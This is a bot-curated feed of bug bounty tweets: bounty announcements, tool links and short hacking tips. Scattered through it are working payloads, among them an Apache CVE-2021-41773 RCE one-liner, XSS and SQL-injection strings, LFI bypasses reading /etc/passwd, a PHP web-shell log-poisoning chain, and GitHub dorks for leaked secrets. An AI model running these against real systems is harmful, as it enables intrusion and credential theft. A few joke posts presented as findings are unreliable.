Bug Hunting Hub
The source of insights for Bug Hunters. The channel is driven by bot, curated by twitter.com/makrushind
instagram.com/makrush.in
#BugBountyTips of the Day
🤔 10 Types of Web Vulnerabilities that are Often Missed Nice overview of vuln classes by @hakluke and @farah_hawaa 1. HTTP/2 Smuggling 2. XXE via Office Open XML Parsers 3. SSRF via XSS in PDF Generators 4. XSS via SVG Files ... #bugbountytips https://t.co/w08K3ad2Ux
---
The free webinar "SQL Injection" is available on video. #hacking #cybersecurity #bugbounty #osint #forensics 🌎 https://t.co/yynzPyot87 https://t.co/jsFzDuXksP
---
Hello Friends, Project Morya is officially made public now. 🚀 GitHub Link : https://t.co/Y7bglBmta8 Project Morya is just a collection of bash scripts that automate your recon process + send notification on your server (example : on discord) #bugbounty #bugbountytips #recon
---
Got extra bonus for XSS in JSON with WAF bypass on private @intigriti splitting my payload like this: firstname : <img src=' lastname: 'onerror=print()> Result: "firstname":"<img src ='","lastname":"'onerror=print()>" JSON in src tag triggers the error: BOOM!! #bugbountytips https://t.co/eMqmQJ9gFJ
---
Hello guys, it's been a long time since my last write-up, so I have written a write-up on my find about 403 Restrictions bypass to get pagespeed admin access. Hope you like it 😊✌️. https://t.co/s5MD67JUTK #bugbounty #bugbountytips #ethicalhacking #cybersecurity
#BugBountyTips of the Day
Account Takeover through Password Reset : 1. Capture the request of forgot password [email protected] and tamper mail id and change to [email protected] Finally will get victim reset link to attacker mail #bugbounty #wapt #cybersecurity
---
Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 All-in-One reproduction for CVE-2021-41773 https://t.co/xeC7X4xeX1 #Vulhub #infosec #security #bugbountytip https://t.co/DhD8BFin4o
---
Scanning for CVE-2021-41773 (Apache 2.4.49 - Path Traversal) using template shared by @daffainfo Template - https://t.co/CX1j1ku5Ot #hackwithautomation #pentest #bugbounty https://t.co/DPSeLu3kA6
---
A lot of companies are using OKTA for authentication these days. Use these GitHub dorks to find some secrets:) OKTA_CLIENT_ORGURL= OKTA_CLIENT_TOKEN= OKTA_OAUTH2_CLIENTSECRET= OKTA_OAUTH2_CLIENTID= OKTA_AUTHN_GROUPID= #bugbountytips
---
many have questioned. this poc.. hi I've made the nuclei-templates ahead of time you can check them out here @pdnuclei https://t.co/vtJOxs2UCq #nuclei #automation #bugbounty
---
Just got a working exploit PoC for path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773) with my collab again @yabeow #bugbountytips 👀 https://t.co/oGHtbWwKHT
---
5k reputations swag from @Hacker0x01 #bugbounty https://t.co/JkVYmaF7V8
#BugBountyTips of the Day
Here is a new write-up on my blog about a recent P1 found on an external program :) https://t.co/vfKIKs8JjT Thanks @infosec_au for the help🤝 #BugBounty #SharingIsCaring
---
Update : CVE-2021-41773 POC as RCE 🔥👇💥 One Liner: cat file | while read host do ; do curl --silent --path-as-is --data "echo;id" '$host/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' | grep "uid" && echo "$host \033[0;31mVuln\n"|| echo "$host \033[0;32mNot\n";done #infosec #bugbounty
#BugBountyTips of the Day
CVE-2021-42013 - Apache 2.4.49/2.4.50 - Path Traversal by nvn1729 "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient" - https://t.co/AK4CQpDGA4 Nuclei Template - https://t.co/SOY8iTU8Bk #hackwithautomation #bugbounty #appsec #pentest https://t.co/dH7StiF3Sd
---
Wait What? 🔥 Apache CVE 2021-41773 One Liner Windows Box: curl -sk —path-as-is " http://host/cgi-bin/.%2e/.%2e/.%2e/.%2e/Windows/System32/cmd.exe?/c+calc.exe" #infosec #bugbounty #Apache #cve
---
🔥🤑🤑 Neat bug bounty I just got. You can hack Google and use their API to make their search engine search for things: curl https://t.co/DQV3mlvADS{QUERY HERE} Nice little £20,160 bounty! Thank you 😻😻 All public APIs are vulns Follow for more #bugbounty tips! https://t.co/GBiv7j8nhK
---
So I reported a RCE to a domain owned by IBM (@Hacker0x01 program) . It was Triaged and now closed as informative because the servers are owned by Amazon. Scope rules say 'domains owned by IBM' Imagine all companies use this excuse. 😂 😂 #bugbountytips #BugBounty
---
Always test JSON body parameters. In my case I bypassed email verification. #bugbountytips https://t.co/pDzPfkJOl7
---
Expand your attack surface by grabbing SSL certificates from ip addresses, match these with your Bug Bounty targets. I'd recommend running this technique on cloud providers such as AWS/Azure/GCP ranges using https://t.co/uvvFVrKTXC cero [CIDR] (cero 0.0.0.0/0) #bugbountytips
#BugBountyTips of the Day
We created a list of the Top 10 most popular Bug Bounty courses and training programs for beginners #bugbounty #learning #infosec https://t.co/j7tKfLvdIV https://t.co/H7YAAqpVfd
---
Another hit by github recon..$$$ Thanks @GodfatherOrwa for sharing tips and keywords. Dork:- " https://t.co/cS7P78DU7v" password Github is ❤️ @ADITYASHENDE17 @e11i0t_4lders0n @theXSSrat #bugbounty #githubrecon #bugcrowd https://t.co/OK824fTHI4
---
Alhamdulillah, I got my highest bounty from @bugcrowd. Thank you so much Almighty Allah . Also thank you so much to the #bugbounty community and those legends who are sharing their secret tips for newbies @GodfatherOrwa @theXSSrat @imranHudaA @remonsec @AkashHamal0x01 #bugbounty https://t.co/oItpiFP9UL
---
Happy to reach 6K reputation at @Hacker0x01 🥶 #BugBounty https://t.co/dMPrumq0oH
#BugBountyTips of the Day
When doing #bugbounty hunting, I struggle a lot with decision paralysis around what to hack on and when to pivot targets. I wrote up what I've been doing to combat this difficulty. Hopefully it helps you as well! https://t.co/8q6cpKXgJh #togetherwehitharder
---
Who of you enjoys escalating vulnerabilities to RCE? 👀 We asked @sec_r0, who was so kind to share one of his tricks 🧙‍♂️ #bugbountytips 👇 https://t.co/GeRizKk6gr
---
SSTI XSS Finder: Just a simple automation tool for newbie 🤠 Tool Link: https://t.co/yFpUgJghQv Manually hunting for the same i had shown in my #YouTuber video, must check out 😎 Video Link: https://t.co/G1UODp1CYZ #HR51KDB #bugbountytips #bugbountytip #xss #ssti #infosec #hack
#BugBountyTips of the Day
I was awarded $9000 for Blind XSS Big thanks to @IAmMandatory for @XssHunter <3 #bugbounty #blindxss #xss #infosec https://t.co/f3KN0F6vA6
---
Qu1cksc0pe - All-in-One Static Malware Analysis Tool https://t.co/Vo2P8NOsxN #cybersecurity #bugbountytips #hacking #tools https://t.co/ULGRNYQHKU
---
🚨🚨 Another 10K giveaway 50 Like - Burp Suite Ext Dev - 10 Coupons 100 Likes - SOP Zine - 10 Coupons 150 Likes - Web Auth Zines- 10 Coupons 200 Likes - Bundle - 3 Coupons Thanks to @FeedHive_io for post conditions functionality. #Security #Learn365 #bugbountytips #bugbounty
---
Command Injection: ~Find Your subdomains ~cat subdomains.txt | httpx | gau | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt ~ ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080 ~search for ”uid” in burp proxy intercept #bugbountytips #bugbounty https://t.co/6vPQeIyZXI
---
Pro Tips to get followers in Infosec: 1) Fake #bugbounty tips 2) Giveaways and Swags on retweets 3) Copy paste payload & write blog on it 4) Asking for followers and saying we are family of 10k 5) Worst one is to tell me that you work in Infosec without actually saying it
---
Misconfigured Reset password that leads to Account Takeover by 'Aditya Sharma' bounty: $5000 Aug 2021 https://t.co/JNxgap268M #AccountTakeover #BugBounty #BugBountyTip #BugBountyTips
---
Found many github leaks using this dork Filename:.ipynb target password @ADITYASHENDE17 @GodfatherOrwa @e11i0t_4lders0n @theXSSrat @cyph3r_asr @purab_parihar #bugbounty #bugbountytips #githubrecon
---
Wordpress juicy endpoints (beginners) 1) wp-includes [directory] 2) index.php 3) wp-login.php 4) wp-links-opml.php 5) wp-activate.php 6) wp-blog-header.php 7) wp-cron.php 8) wp-links.php 9) wp-mail.php 10) xmlrpc.php 11) wp-settings.php 12) wp-trackback.php #bugbountytips #Share
---
API Penetration Examples https://t.co/fWFSUHXTrK #bugbounty #bugbountytips #API #infosec #cybersecurity
#BugBountyTips of the Day
🤑 Found a neat RCE Medium bug on Windows 11 🔥 If the computer is unlocked, you can plug in a bluetooth keyboard and execute any commands you want remotely💻🤯 Nice little $500 from Microsoft for this 🔥 Follow for more tips on bug bounties #bugbounty #hacking #infosec https://t.co/RvOnhS7nsL
---
Reflected XSS a short flyer. Reviewed by our XSS Guru, Mr @theXSSrat, thank you my friend. Download: https://t.co/kvIzV9y62V Join my newsletter: https://t.co/mjNKfR71hP #infosec #appsec #zines #bugbountytips #bugbounty #bugbountytip #Learn365 #security #cybersecurity #hackers https://t.co/LbaQERjfGc
---
My virtual course Forensics with Autopsy is available on video #hacking #cybersecurity #bugbounty #osint #forensics More information at: https://t.co/Xae4e9T6Gd https://t.co/2xXdeshBlm
---
Facebook Bug bounty 🥳🥳 #bugbounty #infosec thanks @fbsecurity https://t.co/ie3inZWa7l
---
While Looking For DOM based XSS make sure where input Reflected In my case <svg/onload=alert()> -> not worked -prompt(1)-- -> worked #bugbountytips #bugbounty https://t.co/63OR1hlKm2
---
I made a python 🐍 script to #bypass IP source #restrictions using HTTP headers. This is really useful in #bug #bounties, #pentest and #CTF. https://t.co/AdBhor1m7Z #bugbountytips #BugBounty
---
Authorization bypass using .json #bugbountytips #pentest #infosec https://t.co/57SPmkVcaT
#BugBountyTips of the Day
My virtual Ethical Hacking course is available on video. #hacking #cybersecurity #bugbounty #osint #forensics More information at: https://t.co/DTtWCqUNav https://t.co/zLszgas0YE
---
I just published 500$ Bug: Sensitive Data Exposure to Broken Access Control leads, How I able to take over any… https://t.co/MxEeuj3nCO #bugbounty #programming #hacking
---
1. User-A capture request to like on his private goal activity 2. Replace activity UUID by User-B's activity UUID **UUID is revealed via some graphql endpoints** 3. User-B's activity got liked #bugbounty #bugbountytip #hackerone https://t.co/DYp2gp5v4m
#BugBountyTips of the Day
Google Hacking for Penetration Testers & Bug Hunters by Johnny Long is a GEM 💎 A detailed and from scratch guide. I started a long time back with this and use it till date. Here -> https://t.co/anvXSFzwpQ #security #infosec #appsec #bugbountytips #bugbounty #learn365 #hackers https://t.co/FXvjboNUzN
---
The video of the free webinar "Cracking Passwords with Rainbow Tables" is available #hacking #cybersecurity #bugbounty #osint #forensics https://t.co/Z9YRtclEDz https://t.co/TUmJjEpgM5
---
If you are just starting out definitely check out https://t.co/GF1auAA6wU I've been going back to it for years for help when I'm stuck. #bugbountytips #bugbounty #infosec #ssrf #hacking Thanks @SynackRedTeam https://t.co/uTXobLAUoP
---
My 0-day was accepted by forti, if anyone has a target using fortigate you are vuln with an unauth bug :) #BugBounty #bugbountytips https://t.co/MmNz7xZe9r
---
.@SynackRedTeam 2021 Swags Unlocked 💥 Here we go . . . Thank you @SynackRedTeam for these awesome swags 😍 #BugBounty #swags https://t.co/SmUNbHkt1L
---
Linux #commandline Cheat Sheet #linux #cheatsheet #hacking #bugbountytips https://t.co/dN9ZmJhRwa
---
#bugbountytip #BugBounty Multiple RCE Wordpress $300,000 1. Design Flaws 2. SQL Injection 3. The Traditional Path to RCE More.. https://t.co/RqXdyvqBet https://t.co/4tEFQstkfS
#BugBountyTips of the Day
Apache <= 2.4.48 - Mod_Proxy SSRF (CVE-2021-40438) Nuclei Template - https://t.co/vbQANmrdI0 Reference - https://t.co/rliMLU9DDg #apache #cve #ssrf #bugbounty #pentest #appsec https://t.co/4q57lclGBh
---
Hey yo @DHLPaket, do you have a #BugBounty program and/or a security contact for me? I would like to tell you how you are losing a massive amount of directly personal data.
---
2500 reputation on the HackerOne platform, with 333 vulnerabilities found in 37 companies! If you need to learn to become a bug hunter, DM me! I have a proof-of-concept and videos for finding bugs. #bugbounty #bugbountytips #cybersecurity https://t.co/rnWBx11SXX
---
Fuxploider - File Upload Vulnerability Scanner - This tool automates the process of detecting and exploiting file upload forms flaws. - Repo: https://t.co/h906eJUk5D - #CyberSecurity #infosec #CTF #BugBounty #bugbountytips https://t.co/SAvHqzaNmi
#BugBountyTips of the Day
Happy to score a nice bounty with @thedawgyg #BugBounty https://t.co/D9OIvrGdmT
---
Basic recon - Shodan dork ssl: https://t.co/pel4aFbi0R 200 ok - Got a few login pages. - Github dork " https://t.co/pel4aFbi0R" "password" - Default Security mechanism with Gmail login, tried on other login pages. BOOM! Internal admin access! #recontips #bugbountytips #recon
---
A way to find many CSRFs.. #bugbounty #bugbountytip https://t.co/fqpqIa1n4l
---
The video of the free webinar "Wireshark" is available. #hacking #cybersecurity #bugbounty #osint #forensics https://t.co/aqsiEHyTSu https://t.co/miW6fFa831
---
Cross site scripting(xss)- Reflected Triaged. payload: "><svg+onload=confirm(document.domain)> #bugbounty https://t.co/ecdLpgKmCC
---
Join Ben Sadeghipour @NahamSec for Introduction to Web Application Hacking & Bug Bounty on Nov. 8-10. Participants are given hands-on experience by learning each vulnerability category & completing a series of challenges. https://t.co/jPrqrTltcz #cybersecurity #bugbounty #appsec https://t.co/e0YSu7b7og
---
Did you know that your Interactsh server may also be used to query cloud metadata services? Reference - https://t.co/ysyONf7BAK #ssrf #apache #appsec #bugbounty #pentest https://t.co/fgBKGcRX1D
---
Google is much more than the dorks! Use cache function when the results from the web archives are not enough. #bugbountytips https://t.co/U0CL8d30nu
---
MOSINT - gather information about the target email https://t.co/ANI9HTW4qT #infosec #cybersecurity #redteam #pentest #pentesting #hacking #hackers #coding #programming #maltego #OSINT #email #bugbounty https://t.co/4kQNQ8DpC6
#BugBountyTips of the Day
Account takeover is lob 😍😍❤️❤️ #hacking #bugbounty https://t.co/DgRlaHUREC
---
Reconftw - Simple Script For Full Recon https://t.co/Av1ZRyn1kA #Pentesting #BugBounty #BruteForce #CyberSecurity #Infosec https://t.co/PPfJB7JG2J
---
Jira Unauthenticated Access to Screens Exploit- {{base-url}}/rest/api/2/screens Note:- Depends on the Program, some accept it and some consider this Informational. #Jira #Infosec #BugBounty
---
Packet-Sniffer - A pure-Python Network Packet Sniffing Tool https://t.co/Jmk3FoPpFP #cybersecurity #bugbountytips #hacking #tools https://t.co/7ugRkmKjc9
---
Hacking easily by switching match/replace rules on and off? 😱 Yeap, that's an absolutely valid technique brought to you by @isira_adithya 👨‍🎤 #bugbountytips 👇 https://t.co/62FcNgxf3i
---
My virtual Hacking with Kali Linux course is available on video. #hacking #cybersecurity #bugbounty #osint #forensics More information at: https://t.co/lsfm4jifRQ https://t.co/kclEQ782QA
#BugBountyTips of the Day
How to find the SQL-Injection Using automatic scrapper & SQLMap 1. Scrape using SECTOOL 2. Save output in your folder 3. Automatic SQLMap command find vulnerable : SQLMap -r /root/target_urls.txt --dbs -v3 https://t.co/AdnXhzhrtS #bugbountytips #bugbounty #cybersecuritytips https://t.co/Tamekx9Qr5
---
Origin - Don't Remember Properly #bugbounty #bugbountytip #bugcrowd #cybersecuritytips #privilegesescalation https://t.co/txFe7rjPEH
---
#bugbountytip #bugbounty RCE on Starbucks Singapore and more for $5600 1. Recon 2. Exploitation 3. Impact More.. https://t.co/fr1HJJ1DjL https://t.co/tpX8XMN2zm
---
Try accessing the /admin path without following redirects {tampering}: ~ https://t.co/sqZAxnhejK -> HTTP 302 (redirect to login page) ~ https://t.co/inYB0wcxF5 -> HTTP 200 OK ~ https://t.co/VjNg01bwtL -> HTTP 200 OK ~ https://t.co/nSBXKSmqNi -> HTTP 200 OK #bugbounty #bugbountytips
#BugBountyTips of the Day
4 most important @Burp_Suite features. - Proxy - Repeater - Intruder - Extender HD image : https://t.co/9xDkrNFtnN Please retweet if you like. Short description 👇👇👇👇 #infosec #zines #bugbountytips #bugbounty #Learn365 #security #hackers https://t.co/DXJsoMf1Ny
---
Alhamdulillah I earned $1,764.70 for my submission on @bugcrowd #ItTakesACrowd #Api pentesting on On-Demand Program #Love to pwn Api function #bugbounty https://t.co/AIfJL6M1nb
---
Find Open Redirect quickly: cat domains.txt | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew #BugBounty #bugbountytip #bugbountytips
---
GitLab disclosed a bug submitted by @wcbowling: https://t.co/LmajrxfjMk - Bounty: $16,000 #hackerone #bugbounty https://t.co/LTA6oReKyD
---
#bugbountytip #bugbounty How I got 9000 USD by hacking into iCloud 1. Apple and the iCloud 2. The XSS Vulnerability 3. The POC More.. https://t.co/HfpGU0EBwU https://t.co/IS00yTTv3d
#BugBountyTips of the Day
Took a little #BugBounty vacation to London, important to refresh after a successful period. https://t.co/ixxaDpGOcj
---
Epic Bug bounty tool 'Commix': commix -u https://t.co/hbIJ2xbkcf.* --data"$data" --cookie="$cookie" --batch -v 3 #bugbounty #bugbountytips #commix #hacker #hackerspace #hacking https://t.co/efvSyomfZx
---
So as you may know I always save half of my #bugbounty payments to cover the down payment for a house. Well we covered the down payment for a house. We put an offer in which got accepted, paid a surveyor, solicitor etc. It's all good. We're getting the keys in 2 weeks!!!!! https://t.co/ZHD0gmxq0B
---
#bugbountytip 1 Authentication Bypass Due Signup Enabled Target/signup.php Target/index.php?page=signup✔️ #bugbountytip 2 In username , email parameter Sleep Payload orwa' AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)-- Happy Hunting Dears https://t.co/vk1v2qmc0I
---
🔨 Break @syscoin and earn up to $25,000! The $SYS #NEVM #bugbounty is now live. Join in now 👇 https://t.co/qku2JmoqBB #hackers #whitehacker #evm #smartcontracts #nevm https://t.co/Xdg8r62bqh
---
Found a subdomain that hadn't been found before with a few vulns. I mainly just use simple websites for finding subdomains. Like https://t.co/szBWgqwQAK and https://t.co/RkpPsM7Tco What do you use? #bugbountytips #bugbounty @SynackRedTeam https://t.co/HFVGAxVnDl
---
Made 1.5k+ reps & $$,$$$ from a single target in 5 months. Persistency is the main key. If I hadn't seen @Ahmad_Halabi_ on the Thanks list, I wouldn't have gone this far😀 Huge thanks to @Ahmad_Halabi_ @zseano & other researchers for providing great resources to the community #bugbounty https://t.co/C9X36OQVsf
#BugBountyTips of the Day
Some more Google Dorks to find Private VDP: inurl:bug-bounty intext:cash rewards site:security.*.com intext:bug bounty site:security.*.* inurl: bounty vulnerability detection program reward intext:Cryptocurrency Exchange intext:Bug bounty #bugbounty #infosec #bugbountytips 1/2
---
LFI Bypass: 1) /usr/bin/cat /etc/passwd == /???/???/c?t$IFS/?t?/p?s?wd 2) /*/?at$IFS/???/???swd 3)/****/?at$IFS/???/*swd 4)/****/?at$IFS/???/*******swd (IFS is Internal Field Separator = [space], [tab] or a [newline]) #bugbounty #bugbountytips #hacker
---
Bug:origin ip using ssrf Bounty:800$ Tip: try ip in browser from burpcollab sometime leads to direct access to the server without waf @ADITYASHENDE17 @sechunt3r @1ndianl33t @sunilyedla2 @niiconsulting @remonsec @e11i0t_4lders0n @GodfatherOrwa @theXSSrat @naglinagli #bugbounty https://t.co/cL7cX6irkr
#BugBountyTips of the Day
Website ("web applications") penetration testing book: the web application hackers handbook. Book link: https://t.co/keW5q4zkfW #الامن_السيبراني #CyberSecurity #BugBounty https://t.co/Huywq22IW8
---
#Thread: Profiting from discovering vulnerabilities 😎 For everyone who wants to get into this field, - this thread is for you - there is something nice at the end of the thread 😍👍🏻 Retweet and like ❤️🔁 #BugBounty #ثريد_الخميس
---
Karma_V2 - A Passive Open Source Intelligence (OSINT) Automated Reconnaissance (Framework) https://t.co/eilqUTVI6y #Pentesting #BugBounty #OSINT #CyberSecurity #Infosec https://t.co/PnIHtQW08M
#BugBountyTips of the Day
Alhamdulillah. Since September I have been working on Recon to try out as many tools as possible and learn different tactics, so today I am happy to publish my workflow. If there is anything wrong, please tell me so I can fix it and learn from you #recon #bugbounty #cybersecurity https://t.co/MN0jbBzhSq
---
Token Spray - Automate the token validation using newly introduced self-contained nuclei template support 🎉🎉 Read the details here - https://t.co/L6tTOuUtTz #hackwithautomation #bugbounty #pentest #osint https://t.co/97g9zqQ01g
---
LFI to RCE via SSH Log File Poisoning (PHP) url: http//10.10.10.10/index.php?file=../../../../../../../var/log/auth.log payload: ssh <?php system($_GET['c']);?>@<target_ip> execute RCE: http//10.10.10.10/index.php?file=../../../../../../../var/log/auth.log&c=id #bugbounty
---
https://t.co/Q61fZ6v2hZ #bugbounty https://t.co/SFQ95suGfi
---
My new XSS Bypass Filter! "/><svg+svg+svg\/\/On+OnLoAd=confirm(1)> Please let me know if some researcher found this before me in the comments! Thank you :) And happy hacking! #bugbounty #bugbountytips #0day #exploit #xss #hacking #hackers #bugs https://t.co/mmax2jXMXh
---
Another Bounty after 2 months total 4000 rupees , ₹3000 is for hard-core GitHub leak thanks to @GodfatherOrwa for his blog & ₹1000 is for reflected XSS on 2 subdomain thanks to @HackerGautam for his script to automate XSS finding #bugbounty #bugbountytip #infosec https://t.co/PPYtpyHwuq